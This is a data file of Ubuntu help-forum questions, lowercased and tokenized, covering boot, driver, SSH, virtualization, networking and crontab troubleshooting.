377715	question about dual booting other linux distro with ubuntu 12.04 lts	my current setup : windows 7 ubuntu 12.04 lts my partition setup is this . ( i used easybcd to resolve grub ) i followed this tutorial . it works flawlessly but i seldom use win7 , so i plan to install win7 in virtualbox , and just delete win7 and install another distro . sda1 - ( probably system reserved for windows ? ? ? ) sda2 - drive c sda3 - drive d ( ntfs ) , shared by both win7 and ubuntu sda5 - /boot ( this is where i installed ubuntu ) sda6 - / sda7 - swap sda8 - /home my questions are : since i installed grub in /boot and use easybcd to fix grub so that it appears during boot time , is it okay to just delete the windows 7 partitions ? both drive c and drive d. would n't i have a problem with booting since i think win7 takes control of the mbr ? ? ? what 's the best linx distro to work alongside ubuntu 12.04 with shared /home partition . thanks in advance .
377718	ca n't make a 2nd ssh key login	so a few months ago i setup key based login on my server so that it only accepts key based logins . no passwords ever . for my main user i have a key which i keep in my .ssh folders so i can login to it . i now have the need for a 2nd user to have a login and after a bit of searching found these instructions on how to create a key ( i assume i did something similar since i did this months ago and i ca n't remember the exact steps ) i 've followed the instructions however i ca n't connect as the new user . i copy id_rsa and id_rsa.pub into my .ssh folder onto the client machine ( after i temporarily renamed the original id_rsa ) and tried to connect but i keep getting : permission denied ( publickey ) . here is a debug output of when i attempt to ssh in : openssh_6.2p1 , openssl 1.0.1e 11 feb 2013 debug1 : connecting to direct.myurl.com [ 209.xx.xx.xx ] port 22. debug1 : connection established . debug1 : identity file /home/username/.ssh/id_rsa type 1 debug1 : identity file /home/username/.ssh/id_rsa-cert type -1 debug1 : identity file /home/username/.ssh/id_dsa type -1 debug1 : identity file /home/username/.ssh/id_dsa-cert type -1 debug1 : identity file /home/username/.ssh/id_ecdsa type -1 debug1 : identity file /home/username/.ssh/id_ecdsa-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.2 debug1 : remote protocol version 2.0 , remote software version openssh_5.8p1 debian-1ubuntu3 debug1 : match : openssh_5.8p1 debian-1ubuntu3 pat openssh_5* debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : rsa aa : aa : aa : aa : aa : aa : aa : aa : aa : aa : aa : aa : aa : aa : aa : aa debug1 : host 'direct.myurl.com ' is known and matches the rsa host key . debug1 : found key in /home/username/.ssh/known_hosts:6 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/username/.ssh/id_rsa debug1 : authentications that can continue : publickey debug1 : trying private key : /home/username/.ssh/id_dsa debug1 : trying private key : /home/username/.ssh/id_ecdsa debug1 : no more authentication methods to try . i feel like i 'm missing something obvious here but ca n't figure it out .
377719	how do you remove your originating ip from thunderbird ?	i 'm in a peculiar position where i need to remove my ip address from my email headers ( i have a pen name ) . i do n't want my readers knowing who i am or where i live . i use gmail to send out my emails with but i was able to find my ipv6 address in an email i sent to myself .
377725	installation error low-graphics mode multiple video cards	i am starting a brand new install and every time i go through the boot up process i get the message `` running in low-graphics mode '' i click ok , which then gives you the 4 options : run in low-graphics mode for just one session ; reconfigure graphics ; trouble shoot this error ; exit to console login ; select run in low-graphics mode give you a message that graphics is going to restarts , but just hangs there after clicking ok ( must ctrl-alt-del to restart - you see the normal unmounting [ ok ] etc . messages ) selecting reconfigure graphics gives you two options : use default ( generic ) configuration ; use your backed-up configuration ; i chose use default and it just gets caught in a loop you can click ok 100 times and still just gives you the same options . you hit cancel and it sends you back to the main menu troubleshoot this error allows you to look at the xlog where it says : warning could n't open module nvidia ; then loaded module nouveua . it does this 3 times once for each card . then it proceeds to load all the dvi interfaces dvi-1 - dvi-10 giving them the correct model for each monitor detected and setting initial mode sizes for each . each monitor detected with proper model and serial number . the xlog then goes on to load the rest of the hardware mouse , keyboard , etc . last 3 lines of the log file read ; aiglx : suspending aiglx clients for vt switch ; nouveau ( 0 ) : nvleavevt is called ; server terminated with error ( 1 ) . closing log file ; it gives an option to review start-up errors , but that is empty . also gives you an option to edit the configuration file which just throws in a loop again . you just keep clicking ok . selecting the last option : exit to console login just blacks the screen and you must ctrl-alt-del ( flashes to show unmounting ) to restart the pc the system has 3 nvidia cards nvs285 ( dual dvi ) and two ( 2 ) nvs 440 ( quad dvi ) . i have tried both the 12.04.3 as well as 13.10 and both hang on the same section . does anyone have an idea what is going on ? being there was no errors in the x-log i can not seem to find out why this is stuck here .
377726	why ca n't i load bios or boot to anything but ubuntu ?	i ca n't install ubuntu studio from usb , boot from the dvd drive or windows from the hard disk . i ca n't open the bios . all i can do is boot from ubuntu installed on a usb hard disk . when i open the boot menu by pressing f10 ubuntu is the only option displayed even if the hard disk is unplugged . i 'm on a samsung series 7 chronos 700z7c-s01us laptop
377727	ubuntu 13.10 only detecting sata port 5 and 6	built the following htpc : cpu : amd a8-6500 3.5ghz quad-core processor cpu cooler : cooler master geminii m4 58.4 cfm sleeve bearing motherboard : asrock fm2a75 pro4-m micro atx fm2 memory : g.skill ripjaws x series 8gb ( 2 x 4gb ) ddr3-2133 storage : kingston ssdnow v300 series 60gb 2.5 '' storage : seagate barracuda 1tb 3.5 '' 7200rpm internal hard drive case : silverstone ml03b htpc case power supply : corsair builder 500w 80 plus bronze certified atx12v power supply optical drive : lg wh14ns40 blu-ray/dvd/cd writer missing in ubuntu problem : motherboard detects all sata ports 1 through 6 , but ubuntu 13.10 linux 3.12 only detects 5 and 6 , which is where my ssd and hdd reside , dvd drive not being detected . so i can boot up , but ca n't watch dvd or play cds yet . anybody have ideas on what i 'm missing ? ~ $ sudo lshw -c disk yields : *-disk description : ata disk product : st1000dm003-1ch1 vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : cc47 serial : s1dekvs2 size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=4096 signature=0001d628 *-disk description : ata disk product : kingston sv300s3 physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/sdb version : 505a serial : 50026b72380285bb size : 55gib ( 60gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000754c4 any help greatly appreciated ! thanks
377728	usb keyboard stops working on installation at language selection	i 'm installing ubuntu 13.10 server ( amd64 ) on a hp proliant microserver . i 'm using a usb keyboard which works fine until i opt to install ubuntu and get to the ( first ) `` select a language '' screen . at this point the keyboard becomes unresponsive and the number lock light turns off . the bios is configured to support usb devices in legacy mode ( hence i can get past the initial boot screen ) . unfortunately the machine does not have a ps/2 port , however i have tried using a range of keyboards to debug this : a standard usb keyboard ( microsoft ergonomic 4000 ) an alternative usb keyboard ( g15 ) a ps/2 keyboard using a passive ps/2-usb connector and another ps/2 keyboard using an active ps/2-usb connector . unfortunately i get the same results with all of these . i note that this has happened to someone else with a wireless keyboard - could this be a case where the installer is not reloading usb devices ?
377743	ubuntu 12.04 can not detect win7 during installation . but sudo os-prober can detect win7	i tried to install ubuntu 12.04.3 lts using usb . but it only showed two options with no intall alongside with win7 . however , when i type sudo os-prober , it shows windows 7 ( loader ) : windows : chain . which means it detects win7 . why does the command detect ubuntu , the installer does n't ? any suggestions ?
377747	ubuntu 12.04 amd/ati hdmi sound/display issues	i am trying to set up an old hp pavilion with a amd processor and an ati radeon graphics card as a media pc . i am having a lot of hdmi issues . what i did was update to the grub as following : grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux= '' quiet splash radeon.audio=1 '' this fixed the audio and i was able to get it working for a little while . but now my pc wo n't detect the hdmi display at all . i was wondering what this update has affected the display ? i did try and get the catalyst control center but that told me that there was no ati graphics card detected ? what should i do ?
377748	connect ps vita to virtual machine on 12.04 or 13.10 ?	i have windows xp virtual machines running on ubuntu 13.10 and 12.04 using both vmware workstation and virtualbox . in both cases when i connect my ps vita to those virtual machines in order to run content manager i see the connection , and windows recognizes the device . so far so good . however , when i run the content manager app on the ps vita the device disconnects from the virtual machine and/or simply fails to connect . does anyone have this working ? is there a trick to it ?
377750	what is the difference between default-jdk , ecj , gcj and openjdk ?	this morning , i tried to install something and came across a statement like this : the program 'javac ' can be found in the following packages : * default-jdk * ecj * gcj-4.6-jdk * gcj-4.7-jdk * openjdk-7-jdk * openjdk-6-jdk try : sudo apt-get install < selected package > what is the difference between default-jdk , ecj , gcj and openjdk ? thanks in advance .
377751	ubuntu upgrade from 13.04 to 13.10 disappears	it gives me the alert , and when i start it , sometimes it gets as far as the confirmation , but usually it just disappears after the user authentication . if i try it manually in the terminal , it gets to `` calculating upgrade ... done '' and then the next line says zero changes the end . it still gets regular updates , and the urls are all pointing to raring , so i do n't know what it thinks is missing .
377753	cursor disapearing ( touch laptop ) 13.10	i use a touch laptop ad have been wondering i there where perhaps any more elaborate answers to the disappearing cursor in 13.10. when using the touch screen on my laptop the cursor will disappear ( this is a good thing ) occasionally after prolonged cursorless sessions the cursor will disappear altogether and no loner return when i use the mouse or track-pad making pointer work much more tedious as i have no idea where the cursor is . i can get the cursor back using sudo modprobe -r psmouse sudo modprobe psmouse as another user pointed out in the terminal but it is not a permanent fix . or i can use gsettings set org.gnome.settings-daemon.plugins.cursor active false which completely solves the disappearing issue but it no longer disappears for touch use so its a half fix .
377754	testing a php file for school with fopen ( ) function , which does not work because of ... permission issues ?	i 'm using ubuntu in my laptop . every time i turn it on , and after ubuntu initializes , it ask me for my admin password , wich i do provide , in order to be able to use it . i 've installed sublime2 , and i 'm learning my first steps in php/mysql i 'm using this ubuntu laptop at my programming class . today , we needed to do some fopen ( ) tests for the first time . i created a file and added to it this code : error_reporting ( e_all ^ e_notice ) ; $ fp=fopen ( `` prueba.txt '' , 'w ' ) ; fwrite ( $ fp , 'curso de php ' ) ; fclose ( $ fp ) ; echo 'horray ' ; now , when i try to run the file ( i 'm using xampp as my local apache , and i 'm using chrome as my browser ) , i getthis error ( and the file is not created at all ) : warning : fopen ( prueba.txt ) : failed to open stream : permission denied in /opt/lampp/htdocs/curso_php1/inicial/ejemplo-archivos.php on line 25 warning : fwrite ( ) expects parameter 1 to be resource , boolean given in /opt/lampp/htdocs/curso_php1/inicial/ejemplo-archivos.php on line 26 warning : fclose ( ) expects parameter 1 to be resource , boolean given in /opt/lampp/htdocs/curso_php1/inicial/ejemplo-archivos.php on line 27 when at my home , i 've tried the code again , in my windows macine , and everything worked as expected , without any errors . it seems as i don have enough permissions ( failed to open stream : permission denied ) , why is that ? why is this happening ? what should i do ? thanks ! ''
377756	desktop icons disappear when i position my second screen not left or right	i am having various issues with dual screen as my setup is not having my screens side by side . but rather the second is above the main and half way to the right . when i set this option my desktop icons disappear and i have other minor problems . i think separate xscreens will fix this but have not found a good guide on how to do this on an nvidia card . xbmc is my main issue , i followed this but without using a side by side setup it does not work . run xbmc fullscreen in second monitor any help in general appreciated , looking to learn about how this all works . also a good guide thanks , noki
377759	out of resolution logon	running ubunto 12 and when the screen reaches the logon window i get a `` screen out of resolution range '' error on my monitor . i am unable to login this way . when i boot to recovery mode and move into the root command line , it seams to be in read-only mode so i am unable to make changes to my system to correct the resolution issue . how can i boot the computer strait to command line so that i can login and fix my resolution issues ?
377760	is it possible to load a virtual machine disk image over nfs without moving the entire image over the network at once ?	my understanding of the situation is more limited than i 'd like , but it appears that i can , for example . pxe boot a live cd and have the squashfs volume be random access over the nfs share . i would like to do be able the same kind of thing with a vm . the goal : * to boot a jeos image over the network , using kvm ( though zen would work , too , or really anything else , i guess ) to launch a virtual machine image located on an nfs server , but clients will be desktops , not servers , and wo n't have the memory or bandwidth to load a multi-gb image over the network to store in ram . random access of the vm image over nfs would be very nice . what kind of vm / image format should i use ? i 've asked this question on a couple of forums without getting any advice .
377761	can i package application after finish develop in ubuntu sdk ?	as the title . i found there is a package option in ubuntu sdk . however , no matter i choose which project type , do n't how to use it . any tips ?
377762	change wallpaper automatically in ubuntu 13.10	well i 'm new on ubuntu , i installed the 13.10 version because i heard it 's faster and smoothly than 12.04 . so , my problem is that i do n't know how to change wallpapers in an automatic way ( slideshow ) , but with my own pictures , i do n't want pictures from flicker , etc . i want to have wallpapers of pictures that i have already downloaded . i searched some programs and i found slidewall but i ca n't download it in ubuntu 13.10 . could anybody lend me some help ? ( sorry if there 's a english confusion , i 'm not too good at it )
377763	no operating system found after installing ubuntu 13.10	i successfully installed ubuntu 13.10 to my acer 4750g laptop but when i restart it , it gives me an error like : could not found : \efi\boot\fallback.efi i tried to use the boot-repair and it succeed but when i restart my laptop again , the it gives me the same error again . here is the url : http : //paste.ubuntu.com/6424180 please if you can help me i will really appreciate it . thank you very much
377767	the right analog stick on my pc controller also acts as the start button	i am a fairly new ubuntu user ( 12.04 32-bit ) . recently when i tried to play super mario all stars on a zsnes emulator , i plugged in my gigaware pc controller . however whenever i tried to use the right analog stick , and i would press up , it acts as the start button . i am fairly experienced when it comes to using the zsnes emulator , so i know it 's not the button mapping . i decided to download jstest-gtk from the software center , but it does n't seem to help unless there is a feature i am over-looking . that is my primary problem , but also my start button is extremely sensitive . just barely touching it brings up the start menu . could someone please help me in finding a solution ?
377769	create an ad-hoc wireless network	i 'm using ultimate edition 3.5 . there is an image below , hopefully it 's clear enough . on the bottom right i created a new network ( ad-hoc ) with a wep key . how do i connect it ? clicking on it or typing it in does n't work . i 'm using ethernet on my laptop , but i tried also enabling ad-hoc on the laptop -- it does n't do anything . on ubuntu 13.10 it was quite simple , ca n't figure it out .
377772	strange beeps with a whoopsie code 976	about every 2 minutes i get a series of 3 beeps . i have checked the application tab on sound and nothing is showing up there . in the error log , at about the same intervals i get an entry for whoopsie { 976 } . sometimes there is a note that the same error repeated several times.. it is a clean install of 13.10 gnome and the only change i have made is installing xscreensaver . the computer works fine , i just get these beeps every two minutes .
377775	why wo n't my password authenticate the software updater ?	i have set up my ubuntu account and password . however , when attempting to install software updates , the password will not authenticate . i have tried changing the password but had the same result . any help would be appreciated . thanks .
377778	how to add users to vboxusers	so i want to use my flashdrive in windows xp , which i am currently running in virtualbox , but when i open up the settings to enable usb usage , i get an error : failed to access the usb subsystem . virtualbox is not currently allowed to access usb devices . you can change this by adding your user to the 'vboxusers ' group . please see the user manual for a more detailed explanation result code : ns_error_failure ( 0x00004005 ) component : host interface : ihost { 30678943-32df-4830-b413-931b25ac86a0 } callee : imachine { 22781af3-1c96-4126-9edf-67a020e0e858 } does anyone know how to fix this ! ? please help ! : s
377780	how to make kde widgets arrangement permanent ( not changeable ) ?	can i make my kde ( on ubuntu ) has permanent arrangement ? so , new user on my public pcs ca n't change the menu size/position , shortcut position/numbers , widget such as clock ca n't be edited , and so on ? thank you .
377785	no sound from headphones after upgrade to 13.10 : asus a55vd	the title pretty much says it all . i had my asus running 12.04 , then upgraded it to 13.10. after the upgrade , my laptop speakers work no problem , but when i plug in some headphones , i get nothing . it does auto-mute and the audio output switches from `` speakers '' to `` headphones '' so i know the headphones are being detected . i 've tried everything that i could find , but no luck . any advice ? thanks !
377786	how to map the alien command center buttons in the alienware 17 ?	i need a ubuntu specific alienware 17 laptop driver pack , which also includes the alien command center buttons programs etc ? just got a alienware 17 2013 with 32gig ram 3 gig video & want to get rid of windows 8 , but do n't want to loose all the alienware specific programs . has anyone tired and succeeded to install all drivers , programs etc ?
377787	nmap scanning entire network ?	okay so i 'm not really sure if this is even possible , but i need to know if there is a way to scan an entire network using nmap instead of a specific ip . basically what i want to do is scan my network for all the devices that are currently connected to it . maybe nmap is n't the tool , if so can someone point me in the right direction .
377788	trying to get wifi on dell inspiron-1764	i have a dell inspiron-1764 . i just installed ubuntu 13.10 . i am new to ubuntu so i really do n't know any commands . i think ubuntu ca n't read my drivers..
377789	when ubuntu touch will released for micromax canvas tab p650	my tab is micromax canvas tab and i want to install ubuntu on my tab so , please help me to that how can i install ubuntu on my tab thank you for receiving my request .
377790	ca n't get adobe pro connection to work	i am a new user to ubuntu and still learning . today i was supposed attend a meeting online and it took me to adobe pro connection and i was unable to connect to it . please tell me what to do .
377791	driving a wqhd ( 2560x1440 ) viewsonic monitor with ubuntu - what is needed ?	i just got a viewsonic vp2770 monitor . its maximal resolution for either dvi or display port is 2560x1440 , and i 'd like to set that . however , my current laptop is old , and does n't have neither dvi nor dp ( i 'm using it right now with a d-sub connector at 2048x1152 ) . since i plan to buy a new machine anyway , i wanted to ask what would be needed to be able to drive such a monitor for sure . what kind of graphics card ? will intel 's integrated graphics do ? should i buy a nvidia card ? if so , which ? i have no need of fancy graphics / 3d - but i do use the screen real estate . as for ubuntu version , is 12.04 good enough ( this is what i 'm using on my boxes currently ) or should i upgrade further to 13.10 , etc ? thanks in advance
377792	can i extend the menu item width ?	i noticed a very annoying bug in ubuntu firefox when using the dom inspector addon . in this addon , you can usually browse all open windows with file menu - inspect chrome document . however , with ubuntu plugin enabled for the top-of-the screen menu , you can only see about 30 characters on this menu , not the full url that is usually displays . this is especially bad since the ending is what you want to see . is there any way to see the full menu text in the ubuntu menu ?
377797	ubuntu driver is not being recognized by the computer	i have a dell inspiron 5150 with windows server 2003 as its operating system . i downloaded the ubuntu desktop 13.10 on a dvd-rw from a laptop with windows 7 home edition . i press f12 to go to the first-time boot , choose to boot it from cd/dvd/cd-rw drive , but it not only does not recognize the driver but loads straight to windows server . what could possibly be the problem ?
377802	purple screen on boot ?	well i reinstalled ubuntu 13.10 multiple times on my computer because of me going crazy if something was n't perfect and then now on my last install i can not get it to boot up all the way . whenever i turn my computer on , it boots up to a blank purple screen and i tried pressing f2 , and other keys to get some kind of information out of the system and i got nothing , just a frozen purple screen . anyways i 'm going to provide a boot repair thing and even after using boot repair my computer still does n't boot . http : //paste.ubuntu.com/6424570/
377804	maas error on pxe image importing time	i have install maas on one of our server . it getting error on pxe image import time . fri , 15 nov 2013 18:50:52 +0530 : finished . wrote to /var/lib/maas/ephemeral/raring/ephemeral/amd64/20131015/dist-root.tar.gz traceback ( most recent call last ) : file `` /usr/sbin/maas-import-ephemerals '' , line 26 , in < module > main ( args ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/ephemerals_script.py '' , line 428 , in main target.sync ( source , args.path ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 85 , in sync return self.sync_index ( reader , path , data , content ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 230 , in sync_index self.sync ( reader , path=epath ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 83 , in sync return self.sync_products ( reader , path , data , content ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 308 , in sync_products self.insert_item ( item , src , target , pgree , ipath_cs ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/import_images/ephemerals_script.py '' , line 247 , in insert_item data , src , target , pedigree , contentsource ) file `` /usr/lib/python2.7/dist-packages/simplestreams/mirrors/__init__.py '' , line 401 , in insert_item size=data.get ( 'size ' ) ) file `` /usr/lib/python2.7/dist-packages/simplestreams/objectstores/__init__.py '' , line 141 , in insert os.unlink ( partfile ) oserror : [ errno 2 ] no such file or directory : '/var/lib/maas/ephemeral/.simplestreams/saucy/release-20131017/saucy-daily-maas-i386.tar.gz.part jagan @ ubuntu : ~ $ ls -lh /var/lib/maas/ephemeral/.simplestreams/saucy/release-20131017/saucy-daily-maas-amd64.tar.gz -rw-r -- r -- 1 root root 316m nov 15 17:35 /var/lib/maas/ephemeral/.simplestreams/saucy/release-20131017/saucy-daily-maas-amd64.tar.gz how to fix this problem ?
377807	windows wont boot in secure-boot uefi mode after installing ubuntu 13.10	i have read a variety of sites but i have n't found anything that has helped me . i just received a lenovo t430s with windows 8 installed . i have installed ubuntu and it will boot while in uefi secure-boot mode but to boot into windows i need to disable uefi secure-boot . can someone please give me some guidance so that i can boot both with uefi secure-boot mode enabled ?
377812	how to connect a nokia phone in ubuntu to backup contacts ?	i wanted to backup and copy all contacts in my phone to ubuntu.is there any software like nokia pc suite in ubuntu for this or is there any other method for back up of contacts
377813	how to uninstall banshee scope in 13.10 ?	13.10 comes with a banshee scope . but it does n't appear as an uninstall option like other scopes offer . so how does user uninstall this scope/lens ?
377814	`` ssh-add ~/.ssh '' only loads one identity when it should load all of them	me @ ubuntu : ~/.ssh $ ls id_rsa id_rsa.pub known_hosts two_rsa two_rsa.pub me @ ubuntu : ssh-add ~/.ssh me @ ubuntu : ssh-add -l 2048 7f:76:9d : b4 : ae : f0:72 : dd:36 : c4:25:02 : e0 : b5:12 : a6 /home/me/.ssh/id_rsa ( rsa ) why is n't two_rsa being loaded ? also , should a production server only have one id loaded at any one time ? is that what 's causing this behaviour ?
377815	another nmap question	okay so i 've recently learned how to run an entire network scan using nmap to find all the devices currently connected to the network that you 're connected to . so my next question is can you scan a network that you are n't connected to . just for example like your neighbors wifi . is that possible to do using nmap ? if not what kind of program could be used to do this ?
377816	show file extension in file name	is there anyway to show files suffixes by default in file name in unity ? for example : if i have a file called test.bin , it is shown as test in unity . i 'd like it to be shown as test.bin by default in unity .
377818	limit bandwidth of application listening at tcp port for development	i set up an application server to listen at this port : tcp : //0.0.0.0:3000 i enter this into chrome 's url and can interface with my web app . great . however , i want to be able to test the app for mobile users and people with slower broadband speeds . how can i throttle the connection speed , but only for this port ? apologies if i 've got my terminology wrong .
377819	unable to install ubuntu lts 12.04.3 on mac os x mavericks : no mountable file systems	i am not able to mount the .iso of ubuntu on my macbook pro with os x mavericks . i tried double click , disk utility and also terminal but the image just wo n't mount nor work . when using double click it says no mountable file systems . when using disk utility it says unable to attach ubuntu-12.04.3-desktop-amd64.iso ( no mountable file systems ) . when using terminal , i was able to create ubuntu.img.dmg but it wo n't mount or install either and the message is similar . what should i do ?
377825	how to setting a proxy in ubuntu touch	i have problem connecting to the internet . this is because my wifi requires a proxy . how to set it up in the ubuntu touch ?
377827	how to hide my presence in the friends app ?	i am usually on facebook via the web page but with chat turned off . however , every time i turn on to the ubuntu friends app it makes my fb chat presence online as a consequence of which i am accosted by ghosts from the past : - ( to boot , it also turns my chat presence online on the fb web page , empathy etc ... effing annoying . is this another `` feature '' needs to disabled somewhere ?
377828	can i install ubuntu on my desktop ? if so , which version is more suitable ?	my desktop specification is : intel ( r ) core ( tm ) 2 duo cpu e7200 @ 2.53ghz 1.99 gb ram i would like to know if my system is eligible for installing ubuntu operating system
377829	firefox full page screenshot error ?	firefox 25.0 version , i taken screen shot by following way shift + f2 then screenshot -- fullscreen after that error showed exception ... `` failure '' nsresult : `` 0x80004005 ( ns_error_failure ) '' location : `` js frame : : resource : ///modules/devtools/builtincommands.jsm : : < top_level > : : line 1764 '' data : no ] it 's not work my site , but work well other site . so i need help , whats does it problem ? how to fix it ?
377831	how to turn off a hdd at startup	last week i bought a thinkpad t430 with a 500gb hdd and added a 128gb ssd to it . then i installed ubuntu on the ssd and i 'm using it , while there is a windows8 pre-installed on the hdd and i never used and never will use it . i want to turn the hdd completely off , because when it is turned on , it decreases the battery life and also it makes some noises ( standard spinning sound of hdd ) . i tried removing the related fstab entries , but it does n't turned off even in the next boot . is there any solution to turn off the hdd without opening the laptop and removing it physically ?
377834	ca n't install ubuntu in thinkpad t430	i tried to install ubuntu on my thinkpad t430 . but after installing , i restart it and choose ubuntu . it says that there is an error . anyone knows that ?
377835	boot problems after trying to install ubuntu	i recently downloaded ubuntu-12.04.3-desktop-amd64 from http : //ubuntu.com . i read the full installation instructions , and also read how to burn a dvd on windows and how to create a bootable usb stick on windows . i made both a dvd and a ubuntu live usb . i tried installing ubuntu in two different ways : i tried to install ubuntu when my laptop was connected to the internet : it downloaded some packages during the installation . after the installation was finished , i could n't boot to ubuntu . i tried to install ubuntu when my laptop was not connected to the internet : an error message occurred when installing . the message was about `` grub '' and `` booting '' . my laptop is an asus k46cb with a core i7 processor .
377836	how to map touch event with xserver in ubuntu 12.04 ?	i connected lcd 7 '' from chipsee to bbbwith ubuntu 12.04 ( 3.8 kernel ) on it . when i gave the command # cat /dev/input/event1 and i touch the screen , i got binary data . when screensaver appears on screen and if i touch the screen then touch pointer appears for a second . otherwise touch does n't work . here is the xinput list : - # xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ lite-on technology corp. usb multimedia keyboard id=8 [ slave pointer ( 2 ) ] ⎜ ↳ pixart usb optical mouse id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ tps65217_pwr_but id=6 [ slave keyboard ( 3 ) ] ↳ lite-on technology corp. usb multimedia keyboard id=7 [ slave keyboard ( 3 ) ] ↳ gpio_keys.13 id=10 [ slave keyboard ( 3 ) ] and touch device is detected as virtual core keyboard `` gpio_keys.13 '' what can be the problem with touch ? ? thank you .
377840	can someone show me how to use command in ubuntu ?	i would like someone to help me and guide me how to use ubuntu from command line .
377843	plugins to be downloaded	i am new to ubuntu and have installed 13.10 on my new lenovo g500 laptop and while i am still exploring the os , my mp3 cds & videos on my mobile are not playing and it says plugin required , but i am unable to download the same . i would like to know whether it automatically downloads when i connect to the internet from the software centre or will i have to manually download the same . thanks , yadu*
377850	is there any way to get contacts into ubuntu one ?	is there any way to get contacts into ubuntuone ? i tried it directly from ubuntu - it did not work ! i tried it via web-interface - it did not work ! i tried it via thunderbird and - guess what - it did not work ! would please anyone tell me how it works ? !
377851	ubuntu 13.10 ( google account - google chrome ) icon issue	i just installed ubuntu 13.10 . i went to the google chrome website using default firefox , downloaded 64 bit chrome , went through the process of the software center , and opened chrome . however , every time i open the google chrome icon on the launcher , it just glows yellow while a different icon called google accounts - google chrome opens . how do i get rid of this google accounts icon and just let the original google chrome open ? executing gedit google-chrome.desktop in /usr/share/applications yielded : * ( gedit:2454 ) : warning** : could not load gedit repository : typelib fil for namespace 'gtksource ' version 3.0 not found . when i executed gedit google-chrome.desktop in terminal , the gedit page was empty ( it did not display any contents for the google-chrome.desktop file ) . how to fix these ? edit 2 : executing google-chrome from terminal opens the regular google chrome , but it runs from terminal ( meaning that if i end the terminal session , i end the chrome session as well ) .
377852	multiboot pxe server in redhat enterprise linux 6.0	i have installed a rhel 6.0 pxe ( pre executional environment ) server in rhel 6.0 , now i need to install ubuntu also in some pc 's through network , how could i make it multi boot so that i could install rhel linux and ubuntu both .
377853	removed ubuntu , how do i now reset the mbr of windows 7 without a windows repair disk	i 've removed ubuntu on my laptop as i need the hdd space , and i 'm instead putting ubuntu on my desktop , i removed grub not realising it would take me to grub rescue . i 've managed to get onto windows 7 using supergrub 2 , but now i ca n't fix the windows boot , and it just keeps booting into grub rescue , how can i fix my mbr for windows 7 so i do n't have to keep going through supergrub 2 ? i 'm pretty new , so do n't get all technical.. thanks for any help in advance
377854	what 's the difference between ubuntu 13.10 amd 12.04 lts ? ? ? and	what 's the difference between ubuntu 13.10 amd 12.04 lts and which one is best for my laptop ( asus k46cb i7 ) imeans which one recognizes my laptop drivers completely ?
377856	nemo is not generating thumbnails	i am using nemo on unity . nemo is not generating thumbnails in 12.04 but nautilus does it so well . why ca n't nemo do itself independently ?
377857	mouse left and right clicks stops working on ubuntu 13.10	i have installed ubuntu 13.10 on my pc and running it beside windows 8 , and when i use ubuntu , the mouse works for some time then the left and right mouse clicks stop working . how do i solve this ?
377861	why is n't evince integrated with the hud in ubuntu 13.10 ?	with evince running and on focus , if i press alt and then type , for instance , `` open '' nothing comes up . is this a bug ? something wrong with my system ? any suggestions on how to fix it ? thanks .
377862	ubuntu on a fresh lenovo g400	i downloaded 12.04 using os x , transferred the iso to usb , then set the lenovo g400 to boot from usb . however , it just goes back to freedos and nothing happens . what else should i do ? thanks
377864	crontab shut down command did n't work	i wanted crontab shut down the system daily but it did n't do so , did i misspelled something ? this is my crontab file : /etc/crontab : system-wide crontab unlike any other crontab you do n't have to run the `crontab' command to install the new version when you edit this file and files in /etc/cron.d . these files also have username fields , that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) shutdown every day at 02:30 am 30 0 2 * * * /sbin/shutdown -h now it 's ok but i 'm a bit new to ubuntu , so i do open crontab -e in the terminal an it 's looks like this : edit this file to introduce tasks to be run by cron . each task to run has to be defined through a single line indicating with different fields when the task will be run and what command to run for the task . to define the time you can provide concrete values for minute ( m ) , hour ( h ) , day of month ( dom ) , month ( mon ) , and day of week ( dow ) or use '* ' in these fields ( for 'any ' ) . notice that tasks will be started based on the cron 's system daemon 's notion of time and timezones . output of the crontab jobs ( including errors ) is sent through email to the user the crontab file belongs to ( unless redirected ) . for example , you can run a backup of all your user accounts at 5 a.m every week with : 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ for more information see the manual pages of crontab ( 5 ) and cron ( 8 ) m h dom mon dow command 30 02 * /sbin/shutdown -h now so i should type my command at the end or how ? and how to save it because i 'm confused .
